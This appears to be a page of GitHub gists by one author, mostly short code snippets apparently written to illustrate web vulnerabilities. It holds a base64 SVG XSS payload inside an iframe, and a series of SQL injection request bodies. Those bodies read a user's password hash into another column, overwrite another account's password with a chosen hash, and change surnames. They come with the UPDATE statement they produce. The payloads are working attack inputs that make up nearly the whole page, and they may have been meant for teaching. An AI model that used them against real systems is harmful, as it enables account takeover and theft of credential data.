Skip to content

Instantly share code, notes, and snippets.

David Gilbertson davidgilbertson

  • Sydney, Australia
Block or report user

Report or block davidgilbertson

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@davidgilbertson
davidgilbertson / iframe-with-xss
Created Oct 20, 2019
View iframe-with-xss
<iframe src="data:image/svg+xml;base64,CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+CiAgPGNpcmNsZSByPSIxMCIgY3g9IjEwIiBjeT0iMTAiIGZpbGw9ImdyZWVuIi8+CiAgPGltYWdlIGhyZWY9IngiIG9uZXJyb3I9ImphdmFzY3JpcHQ6Y29uc29sZS5sb2coJ1NVQ0NFU1M6IFNWRyBYU1MgdmlhIGRhdGEgVVJJJykiIC8+Cjwvc3ZnPg=="></iframe>
@davidgilbertson
davidgilbertson / 10.js
Last active Sep 22, 2019
View 10.js
{
// ...
body: `email=no', surname = salt WHERE username = 'myemail@email.com'; #`
}
@davidgilbertson
davidgilbertson / 9.js
Last active Sep 22, 2019
View 9.js
{
// ...
body: `email=no', password = '00fcdde26dd77af7858a52e3913e6f3330a32b3121a61bce915cc6145fc44453' WHERE username = 'user-two@email.com'; #`
}
@davidgilbertson
davidgilbertson / 8.js
Last active Sep 22, 2019
View 8.js
{
// ...
body: `email=no', surname = SUBSTRING(password, 30, 1000) WHERE username = 'me@email.com'; #`
}
@davidgilbertson
davidgilbertson / 7.js
Last active Sep 22, 2019
View 7.js
{
// ...
body: `email=no', password = '00fcdde26dd77af7858a52e3913e6f3330a32b31' WHERE username = 'user-two@email.com'; #`
}
@davidgilbertson
davidgilbertson / 6.js
Last active Sep 22, 2019
View 6.js
{
// ...
body: `email=no', surname = 'WOOT!!' WHERE username = 'user-two@email.com'; #`
}
@davidgilbertson
davidgilbertson / 5.js
Last active Sep 22, 2019
View 5.js
{
// ...
body: `email=no', surname = password WHERE username = 'me@email.com'; #`
}
@davidgilbertson
davidgilbertson / 4.js
Created Sep 22, 2019
View 4.js
{
// ...
body: `email=no', lastName='testing`
}
@davidgilbertson
davidgilbertson / 3.js
Last active Sep 22, 2019
View 3.js
fetch('https://blah.com/api/users', {
credentials: 'include',
headers: {
authorization: 'Bearer blah',
'content-type': 'application/x-www-form-urlencoded',
'sec-fetch-mode': 'cors',
'x-csrf-token': 'blah',
},
referrer: 'https://blah.com/blah',
referrerPolicy: 'no-referrer-when-downgrade',
@davidgilbertson
davidgilbertson / 4.sql
Created Sep 22, 2019
View 4.sql
UPDATE users SET email = 'no', surname = password WHERE username = 'me@email.com'; # WHERE id = '1234'
You can’t perform that action at this time.